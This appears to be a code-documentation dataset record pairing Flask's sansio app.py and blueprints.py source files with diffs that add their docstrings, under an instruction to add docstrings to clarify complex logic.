    # subclasses that still define this deprecated hook; confirm.
    should_ignore_error: None = None
    """If this method returns ``True``, the error will not be passed to
    teardown handlers, and the context will not be preserved for
    debugging.

    .. deprecated:: 3.2
        Handle errors as needed in teardown handlers instead.

    .. versionadded:: 0.10
    """

    def redirect(self, location: str, code: int = 303) -> BaseResponse:
        """Create a redirect response to ``location``.

        Delegates to Werkzeug's ``redirect`` helper using
        :attr:`response_class` as the response type. ``code`` defaults
        to ``303``.
        """
        return _wz_redirect(
            location,
            code=code,
            Response=self.response_class, # type: ignore[arg-type]
        )
def inject_url_defaults(self, endpoint: str, values: dict[str, t.Any]) -> None:
names: t.Iterable[str | None] = (None,)
# url_for may be called outside a request context, parse the
# passed endpoint instead of using request.blueprints.
if "." in endpoint:
names = chain(
names, reversed(_split_blueprint_path(endpoint.rpartition(".")[0]))
)
for name in names:
if name in self.url_default_functions:
for func in self.url_default_functions[name]:
func(endpoint, values)
def handle_url_build_error(
self, error: BuildError, endpoint: str, values: dict[str, t.Any]
) -> str:
for handler in self.url_build_error_handlers:
try:
rv = handler(error, endpoint, values)
except BuildError as e:
# make error available outside except block
error = e
else:
if rv is not None:
return rv
# Re-raise if called with an active exception, otherwise raise
# the passed in exception.
if error is sys.exc_info()[1]:
raise
raise error | --- +++ @@ -57,6 +57,101 @@
class App(Scaffold):
+ """The flask object implements a WSGI application and acts as the central
+ object. It is passed the name of the module or package of the
+ application. Once it is created it will act as a central registry for
+ the view functions, the URL rules, template configuration and much more.
+
+ The name of the package is used to resolve resources from inside the
+ package or the folder the module is contained in depending on if the
+ package parameter resolves to an actual python package (a folder with
+ an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file).
+
+ For more information about resource loading, see :func:`open_resource`.
+
+ Usually you create a :class:`Flask` instance in your main module or
+ in the :file:`__init__.py` file of your package like this::
+
+ from flask import Flask
+ app = Flask(__name__)
+
+ .. admonition:: About the First Parameter
+
+ The idea of the first parameter is to give Flask an idea of what
+ belongs to your application. This name is used to find resources
+ on the filesystem, can be used by extensions to improve debugging
+ information and a lot more.
+
+ So it's important what you provide there. If you are using a single
+ module, `__name__` is always the correct value. If you however are
+ using a package, it's usually recommended to hardcode the name of
+ your package there.
+
+ For example if your application is defined in :file:`yourapplication/app.py`
+ you should create it with one of the two versions below::
+
+ app = Flask('yourapplication')
+ app = Flask(__name__.split('.')[0])
+
+ Why is that? The application will work even with `__name__`, thanks
+ to how resources are looked up. However it will make debugging more
+ painful. Certain extensions can make assumptions based on the
+ import name of your application. For example the Flask-SQLAlchemy
+ extension will look for the code in your application that triggered
+ an SQL query in debug mode. If the import name is not properly set
+ up, that debugging information is lost. (For example it would only
+ pick up SQL queries in `yourapplication.app` and not
+ `yourapplication.views.frontend`)
+
+ .. versionadded:: 0.7
+ The `static_url_path`, `static_folder`, and `template_folder`
+ parameters were added.
+
+ .. versionadded:: 0.8
+ The `instance_path` and `instance_relative_config` parameters were
+ added.
+
+ .. versionadded:: 0.11
+ The `root_path` parameter was added.
+
+ .. versionadded:: 1.0
+ The ``host_matching`` and ``static_host`` parameters were added.
+
+ .. versionadded:: 1.0
+ The ``subdomain_matching`` parameter was added. Subdomain
+ matching needs to be enabled manually now. Setting
+ :data:`SERVER_NAME` does not implicitly enable it.
+
+ :param import_name: the name of the application package
+ :param static_url_path: can be used to specify a different path for the
+ static files on the web. Defaults to the name
+ of the `static_folder` folder.
+ :param static_folder: The folder with static files that is served at
+ ``static_url_path``. Relative to the application ``root_path``
+ or an absolute path. Defaults to ``'static'``.
+ :param static_host: the host to use when adding the static route.
+ Defaults to None. Required when using ``host_matching=True``
+ with a ``static_folder`` configured.
+ :param host_matching: set ``url_map.host_matching`` attribute.
+ Defaults to False.
+ :param subdomain_matching: consider the subdomain relative to
+ :data:`SERVER_NAME` when matching routes. Defaults to False.
+ :param template_folder: the folder that contains the templates that should
+ be used by the application. Defaults to
+ ``'templates'`` folder in the root path of the
+ application.
+ :param instance_path: An alternative instance path for the application.
+ By default the folder ``'instance'`` next to the
+ package or module is assumed to be the instance
+ path.
+ :param instance_relative_config: if set to ``True`` relative filenames
+ for loading the config are assumed to
+ be relative to the instance path instead
+ of the application root.
+ :param root_path: The path to the root of the application files.
+ This should only be set manually when it can't be detected
+ automatically, such as for namespace packages.
+ """
#: The class of the object assigned to :attr:`aborter`, created by
#: :meth:`create_aborter`. That object is called by
@@ -326,6 +421,14 @@
@cached_property
def name(self) -> str:
+ """The name of the application. This is usually the import name
+ with the difference that it's guessed from the run file if the
+ import name is main. This name is used as a display name when
+ Flask needs the name of the application. It can be set and overridden
+ to change the value.
+
+ .. versionadded:: 0.8
+ """
if self.import_name == "__main__":
fn: str | None = getattr(sys.modules["__main__"], "__file__", None)
if fn is None:
@@ -335,16 +438,53 @@
@cached_property
def logger(self) -> logging.Logger:
+ """A standard Python :class:`~logging.Logger` for the app, with
+ the same name as :attr:`name`.
+
+ In debug mode, the logger's :attr:`~logging.Logger.level` will
+ be set to :data:`~logging.DEBUG`.
+
+ If there are no handlers configured, a default handler will be
+ added. See :doc:`/logging` for more information.
+
+ .. versionchanged:: 1.1.0
+ The logger takes the same name as :attr:`name` rather than
+ hard-coding ``"flask.app"``.
+
+ .. versionchanged:: 1.0.0
+ Behavior was simplified. The logger is always named
+ ``"flask.app"``. The level is only set during configuration,
+ it doesn't check ``app.debug`` each time. Only one format is
+ used, not different ones depending on ``app.debug``. No
+ handlers are removed, and a handler is only added if no
+ handlers are already configured.
+
+ .. versionadded:: 0.3
+ """
return create_logger(self)
@cached_property
def jinja_env(self) -> Environment:
+ """The Jinja environment used to load templates.
+
+ The environment is created the first time this property is
+ accessed. Changing :attr:`jinja_options` after that will have no
+ effect.
+ """
return self.create_jinja_environment()
def create_jinja_environment(self) -> Environment:
raise NotImplementedError()
def make_config(self, instance_relative: bool = False) -> Config:
+ """Used to create the config attribute by the Flask constructor.
+ The `instance_relative` parameter is passed in from the constructor
+ of Flask (there named `instance_relative_config`) and indicates if
+ the config should be relative to the instance path or the root path
+ of the application.
+
+ .. versionadded:: 0.8
+ """
root_path = self.root_path
if instance_relative:
root_path = self.instance_path
@@ -353,24 +493,67 @@ return self.config_class(root_path, defaults)
def make_aborter(self) -> Aborter:
+ """Create the object to assign to :attr:`aborter`. That object
+ is called by :func:`flask.abort` to raise HTTP errors, and can
+ be called directly as well.
+
+ By default, this creates an instance of :attr:`aborter_class`,
+ which defaults to :class:`werkzeug.exceptions.Aborter`.
+
+ .. versionadded:: 2.2
+ """
return self.aborter_class()
def auto_find_instance_path(self) -> str:
+ """Tries to locate the instance path if it was not provided to the
+ constructor of the application class. It will basically calculate
+ the path to a folder named ``instance`` next to your main file or
+ the package.
+
+ .. versionadded:: 0.8
+ """
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path, "instance")
return os.path.join(prefix, "var", f"{self.name}-instance")
def create_global_jinja_loader(self) -> DispatchingJinjaLoader:
+ """Creates the loader for the Jinja environment. Can be used to
+ override just the loader and keep the rest unchanged. It's
+ discouraged to override this function. Instead one should override
+ the :meth:`jinja_loader` function.
+
+ The global loader dispatches between the loaders of the application
+ and the individual blueprints.
+
+ .. versionadded:: 0.7
+ """
return DispatchingJinjaLoader(self)
def select_jinja_autoescape(self, filename: str | None) -> bool:
+ """Returns ``True`` if autoescaping should be active for the given
+ template name. If no template name is given, returns `True`.
+
+ .. versionchanged:: 2.2
+ Autoescaping is now enabled by default for ``.svg`` files.
+
+ .. versionadded:: 0.5
+ """
if filename is None:
return True
return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg"))
@property
def debug(self) -> bool:
+ """Whether debug mode is enabled. When using ``flask run`` to start the
+ development server, an interactive debugger will be shown for unhandled
+ exceptions, and the server will be reloaded when code changes. This maps to the
+ :data:`DEBUG` config key. It may not behave as expected if set late.
+
+ **Do not enable debug mode when deploying in production.**
+
+ Default: ``False``
+ """
return self.config["DEBUG"] # type: ignore[no-any-return]
@debug.setter
@@ -382,9 +565,37 @@
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
+ """Register a :class:`~flask.Blueprint` on the application. Keyword
+ arguments passed to this method will override the defaults set on the
+ blueprint.
+
+ Calls the blueprint's :meth:`~flask.Blueprint.register` method after
+ recording the blueprint in the application's :attr:`blueprints`.
+
+ :param blueprint: The blueprint to register.
+ :param url_prefix: Blueprint routes will be prefixed with this.
+ :param subdomain: Blueprint routes will match on this subdomain.
+ :param url_defaults: Blueprint routes will use these default values for
+ view arguments.
+ :param options: Additional keyword arguments are passed to
+ :class:`~flask.blueprints.BlueprintSetupState`. They can be
+ accessed in :meth:`~flask.Blueprint.record` callbacks.
+
+ .. versionchanged:: 2.0.1
+ The ``name`` option can be used to change the (pre-dotted)
+ name the blueprint is registered with. This allows the same
+ blueprint to be registered multiple times with unique names
+ for ``url_for``.
+
+ .. versionadded:: 0.7
+ """
blueprint.register(self, options)
def iter_blueprints(self) -> t.ValuesView[Blueprint]:
+ """Iterates over all blueprints by the order they were registered.
+
+ .. versionadded:: 0.11
+ """
return self.blueprints.values()
@setupmethod
@@ -456,6 +667,21 @@ def template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
+ """Decorate a function to register it as a custom Jinja filter. The name
+ is optional. The decorator may be used without parentheses.
+
+ .. code-block:: python
+
+ @app.template_filter("reverse")
+ def reverse_filter(s):
+ return reversed(s)
+
+ The :meth:`add_template_filter` method may be used to register a
+ function later rather than decorating.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
if callable(name):
self.add_template_filter(name)
return name
@@ -470,6 +696,15 @@ def add_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja filter.
+
+ The :meth:`template_filter` decorator can be used to register a function
+ by decorating instead.
+
+ :param f: The function to register.
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
self.jinja_env.filters[name or f.__name__] = f
@t.overload
@@ -482,6 +717,28 @@ def template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
+ """Decorate a function to register it as a custom Jinja test. The name
+ is optional. The decorator may be used without parentheses.
+
+ .. code-block:: python
+
+ @app.template_test("prime")
+ def is_prime_test(n):
+ if n == 2:
+ return True
+ for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
+ if n % i == 0:
+ return False
+ return True
+
+ The :meth:`add_template_test` method may be used to register a function
+ later rather than decorating.
+
+ :param name: The name to register the test as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_template_test(name)
return name
@@ -496,6 +753,17 @@ def add_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja test.
+
+ The :meth:`template_test` decorator can be used to register a function
+ by decorating instead.
+
+ :param f: The function to register.
+ :param name: The name to register the test as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
self.jinja_env.tests[name or f.__name__] = f
@t.overload
@@ -508,6 +776,23 @@ def template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
+ """Decorate a function to register it as a custom Jinja global. The name
+ is optional. The decorator may be used without parentheses.
+
+ .. code-block:: python
+
+ @app.template_global
+ def double(n):
+ return 2 * n
+
+ The :meth:`add_template_global` method may be used to register a
+ function later rather than decorating.
+
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_template_global(name)
return name
@@ -522,10 +807,47 @@ def add_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja global.
+
+ The :meth:`template_global` decorator can be used to register a function
+ by decorating instead.
+
+ :param f: The function to register.
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
self.jinja_env.globals[name or f.__name__] = f
@setupmethod
def teardown_appcontext(self, f: T_teardown) -> T_teardown:
+ """Registers a function to be called when the app context is popped. The
+ context is popped at the end of a request, CLI command, or manual ``with``
+ block.
+
+ .. code-block:: python
+
+ with app.app_context():
+ ...
+
+ When the ``with`` block exits (or ``ctx.pop()`` is called), the
+ teardown functions are called just before the app context is
+ made inactive.
+
+ When a teardown function was called because of an unhandled
+ exception it will be passed an error object. If an
+ :meth:`errorhandler` is registered, it will handle the exception
+ and the teardown will not receive it.
+
+ Teardown functions must avoid raising exceptions. If they
+ execute code that might fail they must surround that code with a
+ ``try``/``except`` block and log any errors.
+
+ The return values of teardown functions are ignored.
+
+ .. versionadded:: 0.9
+ """
self.teardown_appcontext_funcs.append(f)
return f
@@ -533,12 +855,21 @@ def shell_context_processor(
self, f: T_shell_context_processor
) -> T_shell_context_processor:
+ """Registers a shell context processor function.
+
+ .. versionadded:: 0.11
+ """
self.shell_context_processors.append(f)
return f
def _find_error_handler(
self, e: Exception, blueprints: list[str]
) -> ft.ErrorHandlerCallable | None:
+ """Return a registered error handler for an exception in this order:
+ blueprint handler for a specific code, app handler for a specific code,
+ blueprint handler for an exception class, app handler for an exception
+ class, or ``None`` if a suitable handler is not found.
+ """
exc_class, code = self._get_exc_class_and_code(type(e))
names = (*blueprints, None)
@@ -557,6 +888,22 @@ return None
def trap_http_exception(self, e: Exception) -> bool:
+ """Checks if an HTTP exception should be trapped or not. By default
+ this will return ``False`` for all exceptions except for a bad request
+ key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It
+ also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``.
+
+ This is called for all HTTP exceptions raised by a view function.
+ If it returns ``True`` for any exception the error handler for this
+ exception is not called and it shows up as regular exception in the
+ traceback. This is helpful for debugging implicitly raised HTTP
+ exceptions.
+
+ .. versionchanged:: 1.0
+ Bad request errors are not trapped by default in debug mode.
+
+ .. versionadded:: 0.8
+ """
if self.config["TRAP_HTTP_EXCEPTIONS"]:
return True
@@ -587,6 +934,20 @@ """
def redirect(self, location: str, code: int = 303) -> BaseResponse:
+ """Create a redirect response object.
+
+ This is called by :func:`flask.redirect`, and can be called
+ directly as well.
+
+ :param location: The URL to redirect to.
+ :param code: The status code for the redirect.
+
+ .. versionchanged:: 3.2
+ ``code`` defaults to ``303`` instead of ``302``.
+
+ .. versionadded:: 2.2
+ Moved from ``flask.redirect``, which calls this method.
+ """
return _wz_redirect(
location,
code=code,
@@ -594,6 +955,12 @@ )
def inject_url_defaults(self, endpoint: str, values: dict[str, t.Any]) -> None:
+ """Injects the URL defaults for the given endpoint directly into
+ the values dictionary passed. This is used internally and
+ automatically called on URL building.
+
+ .. versionadded:: 0.7
+ """
names: t.Iterable[str | None] = (None,)
# url_for may be called outside a request context, parse the
@@ -611,6 +978,20 @@ def handle_url_build_error(
self, error: BuildError, endpoint: str, values: dict[str, t.Any]
) -> str:
+ """Called by :meth:`.url_for` if a
+ :exc:`~werkzeug.routing.BuildError` was raised. If this returns
+ a value, it will be returned by ``url_for``, otherwise the error
+ will be re-raised.
+
+ Each function in :attr:`url_build_error_handlers` is called with
+ ``error``, ``endpoint`` and ``values``. If a function returns
+ ``None`` or raises a ``BuildError``, it is skipped. Otherwise,
+ its return value is returned by ``url_for``.
+
+ :param error: The active ``BuildError`` being handled.
+ :param endpoint: The endpoint being built.
+ :param values: The keyword arguments passed to ``url_for``.
+ """
for handler in self.url_build_error_handlers:
try:
rv = handler(error, endpoint, values)
@@ -626,4 +1007,4 @@ if error is sys.exc_info()[1]:
raise
- raise error+ raise error
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sansio/app.py |
Add docstrings to clarify complex logic | from __future__ import annotations
import os
import typing as t
from collections import defaultdict
from functools import update_wrapper
from .. import typing as ft
from .scaffold import _endpoint_from_view_func
from .scaffold import _sentinel
from .scaffold import Scaffold
from .scaffold import setupmethod
if t.TYPE_CHECKING: # pragma: no cover
from .app import App
DeferredSetupFunction = t.Callable[["BlueprintSetupState"], None]
T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any])
T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable)
T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_context_processor = t.TypeVar(
"T_template_context_processor", bound=ft.TemplateContextProcessorCallable
)
T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable)
T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable)
T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable)
T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable)
T_url_value_preprocessor = t.TypeVar(
"T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable
)
class BlueprintSetupState:
def __init__(
self,
blueprint: Blueprint,
app: App,
options: t.Any,
first_registration: bool,
) -> None:
#: a reference to the current application
self.app = app
#: a reference to the blueprint that created this setup state.
self.blueprint = blueprint
#: a dictionary with all options that were passed to the
#: :meth:`~flask.Flask.register_blueprint` method.
self.options = options
#: as blueprints can be registered multiple times with the
#: application and not everything wants to be registered
#: multiple times on it, this attribute can be used to figure
#: out if the blueprint was registered in the past already.
self.first_registration = first_registration
subdomain = self.options.get("subdomain")
if subdomain is None:
subdomain = self.blueprint.subdomain
#: The subdomain that the blueprint should be active for, ``None``
#: otherwise.
self.subdomain = subdomain
url_prefix = self.options.get("url_prefix")
if url_prefix is None:
url_prefix = self.blueprint.url_prefix
#: The prefix that should be used for all URLs defined on the
#: blueprint.
self.url_prefix = url_prefix
self.name = self.options.get("name", blueprint.name)
self.name_prefix = self.options.get("name_prefix", "")
#: A dictionary with URL defaults that is added to each and every
#: URL that was defined with the blueprint.
self.url_defaults = dict(self.blueprint.url_values_defaults)
self.url_defaults.update(self.options.get("url_defaults", ()))
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
**options: t.Any,
) -> None:
if self.url_prefix is not None:
if rule:
rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/")))
else:
rule = self.url_prefix
options.setdefault("subdomain", self.subdomain)
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func) # type: ignore
defaults = self.url_defaults
if "defaults" in options:
defaults = dict(defaults, **options.pop("defaults"))
self.app.add_url_rule(
rule,
f"{self.name_prefix}.{self.name}.{endpoint}".lstrip("."),
view_func,
defaults=defaults,
**options,
)
class Blueprint(Scaffold):
_got_registered_once = False
def __init__(
self,
name: str,
import_name: str,
static_folder: str | os.PathLike[str] | None = None,
static_url_path: str | None = None,
template_folder: str | os.PathLike[str] | None = None,
url_prefix: str | None = None,
subdomain: str | None = None,
url_defaults: dict[str, t.Any] | None = None,
root_path: str | None = None,
cli_group: str | None = _sentinel, # type: ignore[assignment]
):
super().__init__(
import_name=import_name,
static_folder=static_folder,
static_url_path=static_url_path,
template_folder=template_folder,
root_path=root_path,
)
if not name:
raise ValueError("'name' may not be empty.")
if "." in name:
raise ValueError("'name' may not contain a dot '.' character.")
self.name = name
self.url_prefix = url_prefix
self.subdomain = subdomain
self.deferred_functions: list[DeferredSetupFunction] = []
if url_defaults is None:
url_defaults = {}
self.url_values_defaults = url_defaults
self.cli_group = cli_group
self._blueprints: list[tuple[Blueprint, dict[str, t.Any]]] = []
def _check_setup_finished(self, f_name: str) -> None:
if self._got_registered_once:
raise AssertionError(
f"The setup method '{f_name}' can no longer be called on the blueprint"
f" '{self.name}'. It has already been registered at least once, any"
" changes will not be applied consistently.\n"
"Make sure all imports, decorators, functions, etc. needed to set up"
" the blueprint are done before registering it."
)
@setupmethod
def record(self, func: DeferredSetupFunction) -> None:
self.deferred_functions.append(func)
@setupmethod
def record_once(self, func: DeferredSetupFunction) -> None:
def wrapper(state: BlueprintSetupState) -> None:
if state.first_registration:
func(state)
self.record(update_wrapper(wrapper, func))
def make_setup_state(
self, app: App, options: dict[str, t.Any], first_registration: bool = False
) -> BlueprintSetupState:
return BlueprintSetupState(self, app, options, first_registration)
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
if blueprint is self:
raise ValueError("Cannot register a blueprint on itself")
self._blueprints.append((blueprint, options))
def register(self, app: App, options: dict[str, t.Any]) -> None:
name_prefix = options.get("name_prefix", "")
self_name = options.get("name", self.name)
name = f"{name_prefix}.{self_name}".lstrip(".")
if name in app.blueprints:
bp_desc = "this" if app.blueprints[name] is self else "a different"
existing_at = f" '{name}'" if self_name != name else ""
raise ValueError(
f"The name '{self_name}' is already registered for"
f" {bp_desc} blueprint{existing_at}. Use 'name=' to"
f" provide a unique name."
)
first_bp_registration = not any(bp is self for bp in app.blueprints.values())
first_name_registration = name not in app.blueprints
app.blueprints[name] = self
self._got_registered_once = True
state = self.make_setup_state(app, options, first_bp_registration)
if self.has_static_folder:
state.add_url_rule(
f"{self.static_url_path}/<path:filename>",
view_func=self.send_static_file, # type: ignore[attr-defined]
endpoint="static",
)
# Merge blueprint data into parent.
if first_bp_registration or first_name_registration:
self._merge_blueprint_funcs(app, name)
for deferred in self.deferred_functions:
deferred(state)
cli_resolved_group = options.get("cli_group", self.cli_group)
if self.cli.commands:
if cli_resolved_group is None:
app.cli.commands.update(self.cli.commands)
elif cli_resolved_group is _sentinel:
self.cli.name = name
app.cli.add_command(self.cli)
else:
self.cli.name = cli_resolved_group
app.cli.add_command(self.cli)
for blueprint, bp_options in self._blueprints:
bp_options = bp_options.copy()
bp_url_prefix = bp_options.get("url_prefix")
bp_subdomain = bp_options.get("subdomain")
if bp_subdomain is None:
bp_subdomain = blueprint.subdomain
if state.subdomain is not None and bp_subdomain is not None:
bp_options["subdomain"] = bp_subdomain + "." + state.subdomain
elif bp_subdomain is not None:
bp_options["subdomain"] = bp_subdomain
elif state.subdomain is not None:
bp_options["subdomain"] = state.subdomain
if bp_url_prefix is None:
bp_url_prefix = blueprint.url_prefix
if state.url_prefix is not None and bp_url_prefix is not None:
bp_options["url_prefix"] = (
state.url_prefix.rstrip("/") + "/" + bp_url_prefix.lstrip("/")
)
elif bp_url_prefix is not None:
bp_options["url_prefix"] = bp_url_prefix
elif state.url_prefix is not None:
bp_options["url_prefix"] = state.url_prefix
bp_options["name_prefix"] = name
blueprint.register(app, bp_options)
def _merge_blueprint_funcs(self, app: App, name: str) -> None:
def extend(
bp_dict: dict[ft.AppOrBlueprintKey, list[t.Any]],
parent_dict: dict[ft.AppOrBlueprintKey, list[t.Any]],
) -> None:
for key, values in bp_dict.items():
key = name if key is None else f"{name}.{key}"
parent_dict[key].extend(values)
for key, value in self.error_handler_spec.items():
key = name if key is None else f"{name}.{key}"
value = defaultdict(
dict,
{
code: {exc_class: func for exc_class, func in code_values.items()}
for code, code_values in value.items()
},
)
app.error_handler_spec[key] = value
for endpoint, func in self.view_functions.items():
app.view_functions[endpoint] = func
extend(self.before_request_funcs, app.before_request_funcs)
extend(self.after_request_funcs, app.after_request_funcs)
extend(
self.teardown_request_funcs,
app.teardown_request_funcs,
)
extend(self.url_default_functions, app.url_default_functions)
extend(self.url_value_preprocessors, app.url_value_preprocessors)
extend(self.template_context_processors, app.template_context_processors)
@setupmethod
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
if endpoint and "." in endpoint:
raise ValueError("'endpoint' may not contain a dot '.' character.")
if view_func and hasattr(view_func, "__name__") and "." in view_func.__name__:
raise ValueError("'view_func' name may not contain a dot '.' character.")
self.record(
lambda s: s.add_url_rule(
rule,
endpoint,
view_func,
provide_automatic_options=provide_automatic_options,
**options,
)
)
@t.overload
def app_template_filter(self, name: T_template_filter) -> T_template_filter: ...
@t.overload
def app_template_filter(
self, name: str | None = None
) -> t.Callable[[T_template_filter], T_template_filter]: ...
@setupmethod
def app_template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
if callable(name):
self.add_app_template_filter(name)
return name
def decorator(f: T_template_filter) -> T_template_filter:
self.add_app_template_filter(f, name=name)
return f
return decorator
@setupmethod
def add_app_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
def register_template_filter(state: BlueprintSetupState) -> None:
state.app.add_template_filter(f, name=name)
self.record_once(register_template_filter)
@t.overload
def app_template_test(self, name: T_template_test) -> T_template_test: ...
@t.overload
def app_template_test(
self, name: str | None = None
) -> t.Callable[[T_template_test], T_template_test]: ...
@setupmethod
def app_template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
if callable(name):
self.add_app_template_test(name)
return name
def decorator(f: T_template_test) -> T_template_test:
self.add_app_template_test(f, name=name)
return f
return decorator
@setupmethod
def add_app_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
def register_template_test(state: BlueprintSetupState) -> None:
state.app.add_template_test(f, name=name)
self.record_once(register_template_test)
@t.overload
def app_template_global(self, name: T_template_global) -> T_template_global: ...
@t.overload
def app_template_global(
self, name: str | None = None
) -> t.Callable[[T_template_global], T_template_global]: ...
@setupmethod
def app_template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
if callable(name):
self.add_app_template_global(name)
return name
def decorator(f: T_template_global) -> T_template_global:
self.add_app_template_global(f, name=name)
return f
return decorator
@setupmethod
def add_app_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
def register_template_global(state: BlueprintSetupState) -> None:
state.app.add_template_global(f, name=name)
self.record_once(register_template_global)
@setupmethod
def before_app_request(self, f: T_before_request) -> T_before_request:
self.record_once(
lambda s: s.app.before_request_funcs.setdefault(None, []).append(f)
)
return f
@setupmethod
def after_app_request(self, f: T_after_request) -> T_after_request:
self.record_once(
lambda s: s.app.after_request_funcs.setdefault(None, []).append(f)
)
return f
@setupmethod
def teardown_app_request(self, f: T_teardown) -> T_teardown:
self.record_once(
lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f)
)
return f
@setupmethod
def app_context_processor(
self, f: T_template_context_processor
) -> T_template_context_processor:
self.record_once(
lambda s: s.app.template_context_processors.setdefault(None, []).append(f)
)
return f
@setupmethod
def app_errorhandler(
self, code: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
def decorator(f: T_error_handler) -> T_error_handler:
def from_blueprint(state: BlueprintSetupState) -> None:
state.app.errorhandler(code)(f)
self.record_once(from_blueprint)
return f
return decorator
@setupmethod
def app_url_value_preprocessor(
self, f: T_url_value_preprocessor
) -> T_url_value_preprocessor:
self.record_once(
lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f)
)
return f
@setupmethod
def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults:
self.record_once(
lambda s: s.app.url_default_functions.setdefault(None, []).append(f)
)
return f | --- +++ @@ -32,6 +32,11 @@
class BlueprintSetupState:
+ """Temporary holder object for registering a blueprint with the
+ application. An instance of this class is created by the
+ :meth:`~flask.Blueprint.make_setup_state` method and later passed
+ to all register callback functions.
+ """
def __init__(
self,
@@ -86,6 +91,10 @@ view_func: ft.RouteCallable | None = None,
**options: t.Any,
) -> None:
+ """A helper method to register a rule (and optionally a view function)
+ to the application. The endpoint is automatically prefixed with the
+ blueprint's name.
+ """
if self.url_prefix is not None:
if rule:
rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/")))
@@ -108,6 +117,57 @@
class Blueprint(Scaffold):
+ """Represents a blueprint, a collection of routes and other
+ app-related functions that can be registered on a real application
+ later.
+
+ A blueprint is an object that allows defining application functions
+ without requiring an application object ahead of time. It uses the
+ same decorators as :class:`~flask.Flask`, but defers the need for an
+ application by recording them for later registration.
+
+ Decorating a function with a blueprint creates a deferred function
+ that is called with :class:`~flask.blueprints.BlueprintSetupState`
+ when the blueprint is registered on an application.
+
+ See :doc:`/blueprints` for more information.
+
+ :param name: The name of the blueprint. Will be prepended to each
+ endpoint name.
+ :param import_name: The name of the blueprint package, usually
+ ``__name__``. This helps locate the ``root_path`` for the
+ blueprint.
+ :param static_folder: A folder with static files that should be
+ served by the blueprint's static route. The path is relative to
+ the blueprint's root path. Blueprint static files are disabled
+ by default.
+ :param static_url_path: The url to serve static files from.
+ Defaults to ``static_folder``. If the blueprint does not have
+ a ``url_prefix``, the app's static route will take precedence,
+ and the blueprint's static files won't be accessible.
+ :param template_folder: A folder with templates that should be added
+ to the app's template search path. The path is relative to the
+ blueprint's root path. Blueprint templates are disabled by
+ default. Blueprint templates have a lower precedence than those
+ in the app's templates folder.
+ :param url_prefix: A path to prepend to all of the blueprint's URLs,
+ to make them distinct from the rest of the app's routes.
+ :param subdomain: A subdomain that blueprint routes will match on by
+ default.
+ :param url_defaults: A dict of default values that blueprint routes
+ will receive by default.
+ :param root_path: By default, the blueprint will automatically set
+ this based on ``import_name``. In certain situations this
+ automatic detection can fail, so the path can be specified
+ manually instead.
+
+ .. versionchanged:: 1.1.0
+ Blueprints have a ``cli`` group to register nested CLI commands.
+ The ``cli_group`` parameter controls the name of the group under
+ the ``flask`` command.
+
+ .. versionadded:: 0.7
+ """
_got_registered_once = False
@@ -162,10 +222,20 @@
@setupmethod
def record(self, func: DeferredSetupFunction) -> None:
+ """Registers a function that is called when the blueprint is
+ registered on the application. This function is called with the
+ state as argument as returned by the :meth:`make_setup_state`
+ method.
+ """
self.deferred_functions.append(func)
@setupmethod
def record_once(self, func: DeferredSetupFunction) -> None:
+ """Works like :meth:`record` but wraps the function in another
+ function that will ensure the function is only called once. If the
+ blueprint is registered a second time on the application, the
+ function passed is not called.
+ """
